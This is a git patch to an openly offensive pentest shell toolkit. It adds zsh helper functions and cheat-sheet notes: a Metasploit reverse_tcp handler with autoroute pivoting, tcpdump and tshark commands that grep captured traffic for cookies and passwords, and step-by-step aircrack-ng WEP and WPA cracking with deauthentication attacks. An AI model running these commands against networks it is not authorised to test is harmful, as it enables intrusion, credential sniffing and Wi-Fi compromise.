From 85d6e65b5de1e119008caed9e7b50c4508ddd90e Mon Sep 17 00:00:00 2001
From: 51x <six@keemail.me>
Date: Sun, 15 Jan 2017 23:23:28 +0100
Subject: [PATCH] n function and dep checking

---
 README.md                                     | 42 ++++++-----
 profile_files/.ptz/v3das/_n                   |  3 +
 .../v3das/metasploit_meterpreter_pivoting.txt | 17 +++++
 .../network_sniffing_tcpdump_examples.txt     |  7 ++
 .../network_sniffing_tshark_examples.txt      | 11 +++
 .../.ptz/v3das/network_switch_cisco_reset.txt |  7 ++
 .../network_wireless_cracking_aircrack.txt    | 75 +++++++++++++++++++
 profile_files/.zsh/pentest_functions.zsh      | 67 +++++++++++------
 8 files changed, 190 insertions(+), 39 deletions(-)
 create mode 100644 profile_files/.ptz/v3das/_n
 create mode 100644 profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
 create mode 100644 profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
 create mode 100644 profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
 create mode 100644 profile_files/.ptz/v3das/network_switch_cisco_reset.txt
 create mode 100644 profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt

diff --git a/README.md b/README.md
index 976f9d1..d36f7e3 100755
--- a/README.md
+++ b/README.md
@@ -9,22 +9,37 @@ Usability features: tor trigger (ton/tof), external ip check, tor check... and m
 
 Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches.
 
-Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
-
-Installing full console after you have the dependencies: cp profile_files/.* -R ~/
-
-Using only the pentest function can be done by including: pentest_functions.zsh 
+Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. If the dependencies are not met, the functions will still run, but outputs will be empty - at least in the currently status.
 
 
-Functions
-=========
+Install
+=======
 
-pawnpls   - Automatically enumerate and start predefined attacks such as brute force.
+Full console install: git clone https://github.com/51x/PTZ && cd PTZ && cp profile_files/.* -R ~/
+
+Using only the pentest functions can be done by including just: pentest_functions.zsh
+If you want also the notes/knowledge database, you shoul add the v3das folder to you ~/.ptz/ folder.
+
+
+General function of PTZ
+=======================
+
+pawnpls   - Automatically enumerate and start predefined attacks such as brute force. Output goes to ~/.ptz/$target/
             Example for single target: autopawn n0nexi-stent.com
             Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
 
 
-everythingworksornot\? - check if everything works or not for this script (tbd)
+ptzdepchk - check if all dependencies are installed or not, print if something is missing
+
+
+Notes functions
+===============
+
+n         - query notes about a topic, use tab auto complete
+
+nls       - list all the notes
+
+rnd       - get random strings (lengths: 8,16,32,64)
 
 
 chk functions
@@ -45,12 +60,3 @@ johnzip   - Crack zip files using john
 
 johnrar   - Crack rar files using john
             Example: johnrar data.rar rockyou.txt
-
-
-help functions
-==============
-
-hlp       - Get help of the hlp command
-hlprnd    - Get random strings (lengths: 8,16,32,64)
-hlp <var> - Get help about <var> - not yet implemented
-i         - Get information about a topic, use tab after i
diff --git a/profile_files/.ptz/v3das/_n b/profile_files/.ptz/v3das/_n
new file mode 100644
index 0000000..fb5f1ab
--- /dev/null
+++ b/profile_files/.ptz/v3das/_n
@@ -0,0 +1,3 @@
+#compdef n
+
+_arguments "1: :( $(ls ~/.ptz/v3das/ ) )"
diff --git a/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
new file mode 100644
index 0000000..995512a
--- /dev/null
+++ b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
@@ -0,0 +1,17 @@
+# With "autoroute" it is possible to attack through the remote machine.
+
+# Start handler
+use exploit/multi/handler
+set payload windows/meterpreter/reverse_tcp
+set lhost 10.1.1.1
+
+# Add route to which network you want to look into
+run autoroute -s 10.2.2.0/24
+run autoroute -p
+
+# Scan
+use auxiliary/scanner/portscan/tcp 
+set RHOSTS 10.2.2.0/24
+set THREADS 50
+set ports 20,21,22,25,53,69,80,139,443,445,993,8080
+
diff --git a/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
new file mode 100644
index 0000000..264636a
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
@@ -0,0 +1,7 @@
+
+tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
+tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
+tcpdump -r file.cap -s 1024 -l -A dst domain.com
+
+tcpdump -A # show raw data 
+
diff --git a/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
new file mode 100644
index 0000000..cf685d2
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
@@ -0,0 +1,11 @@
+
+# tshark follow stream
+tshark -r <capture file> -R "<filter>" -T fields -e tcp.stream
+tshark -q -r http.pcapng -z follow,tcp,ascii,1
+
+# etc
+tshark grep from http
+tshark -r file.cap 'http'  | egrep -i "login|pass" 
+tshark  'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
+tshark  'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'  -R'http.request.method == "GET" || http.request.method == "HEAD"'
+
diff --git a/profile_files/.ptz/v3das/network_switch_cisco_reset.txt b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
new file mode 100644
index 0000000..a2310d5
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
@@ -0,0 +1,7 @@
+
+# reset a cisco switch
+flash_init
+dir flash:
+rename flash:config.text flash:config.backup
+boot
+
diff --git a/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
new file mode 100644
index 0000000..d8fca42
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
@@ -0,0 +1,75 @@
+# cracking WEP with clients
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake-auth
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0    # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get an ARP packet faster
+aircrack-ng -0 $CAP_FILE
+
+
+# cracking WEP via a client
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake auth
+aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0    # Interactive packet reply attack
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# clientless WEP cracking
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake-auth
+aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0    # Fragmentation attack for PRGA
+aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0    # If Frag attack fails, use Korek ChopChop attack for PRGA
+packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME    # After got PRGA
+aireplay-ng -2 -r $PACKET_FILENAME mon0    # Interactive packet reply after crafted the packet
+aircrack-ng -0 $CAP_FILE
+
+
+# bypassing WEP SKA
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication attack for PRGA xor file
+aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0    # Shared key fake auth attack
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0    # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get an ARP packet faster
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# cracking WPA PSK
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
+
+
+# cracking WPA with John The Ripper
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+# change to password folder
+vim john.conf    # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
+./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
+
+
+# cracking WPA with coWPAtty
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
+genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID    # Gen WPA hashes for rainbow attack
+cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID    # Start the rainbow attack 
+
+
+# cracking WPA with pyrit
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+pyrit list_cores
+pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
+
+pyrit -i $WORDLIST import_password    # Import the wordlist to the database
+pyrit -e $AP_ESSID create_essid    # Add ESSID to the database 
+pyrit batch
+pyrit -r $CAPTURE_FILE attack_db
+
diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh
index 712a812..238f731 100644
--- a/profile_files/.zsh/pentest_functions.zsh
+++ b/profile_files/.zsh/pentest_functions.zsh
@@ -1,26 +1,54 @@
+# Experimental version!
+
 debug=1
 
-function everythingworksornot"?" {
-    echo "really?"
-    # tba: dependency checks for all functions
+fpath=(~/.ptz/v3das $fpath) 
+autoload -U compinit
+compinit
+zstyle ':completion:*' menu select=2
+
+function nls {
+    echo "You can get help from the following topics:"
+    for f in ~/.ptz/v3das/* ; do
+        echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
+    done
 }
 
 
-function i {
+function n {
+    # query knowledgebase, use tab after n
     if [ -d "~/.ptz/v3das" ]
       then
-        cat ~/.ptz/v3das/
+        echo "knowledge base / notes are missing"
+    else
+        cat ~/.ptz/v3das/$1
     fi
 }
 
 
-function hlp {
-    echo "this function is not yet implemented"
-    if [ $# -ne 1 ]
-      then
-        echo "this function is not yet implemented"
-        return
-    fi
+function ptzdepchk {
+    # check if dependencies are met or not
+    type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
+    type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
+    type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
+    type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
+    type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
+    type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
+    type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
+    type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
+    type theharvester >/dev/null 2>&1 || { echo >&2 "theharvester is missing."; }
+    type dnsenum >/dev/null 2>&1 || { echo >&2 "dnsenum is missing."; }
+    type fierce >/dev/null 2>&1 || { echo >&2 "fierce is missing."; }
+    type nmap >/dev/null 2>&1 || { echo >&2 "nmap is missing."; }
+    type searchsploit >/dev/null 2>&1 || { echo >&2 "searchsploit is missing."; }
+    type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
+    #type dig >/dev/null 2>&1 || { echo >&2 "dig is missing."; }
+    #type curl  >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
+    #type arachni >/dev/null 2>&1 || { echo >&2 "arachni is missing."; }
+    #type hydra >/dev/null 2>&1 || { echo >&2 "hydra is missing."; }
+    type  python >/dev/null 2>&1 || { echo >&2 "python is missing."; }
+    #type dirb >/dev/null 2>&1 || { echo >&2 "dirb is missing."; }
+     
 }
 
 
@@ -35,11 +63,13 @@ function tof {
 
 
 function tip {
+    # check if tor is really used or not
     wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq
 }
 
 
 function wip {
+    # check public ip
     if [ $RANDOM -gt $RANDOM ]
         then
             wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain
@@ -52,6 +82,7 @@ function wip {
 
 
 function chkhttpz {
+    # http response checks from a given host / port
     echo "HTTP responses"
     wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
 
@@ -61,19 +92,13 @@ function chkhttpz {
 
 
 function chkcrt {
+    # check ssl certificate of a server
     openssl s_client -showcerts -connect $1:$2
 }
 
 
-function hlp {
-    echo "You can get help from the following topics:"
-    for f in ~/.ptz/v3das/* ; do
-        echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
-    done
-}
-
-
-function hlprnd {
+function rnd {
+    # get some random characters
     cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
     cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
     cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;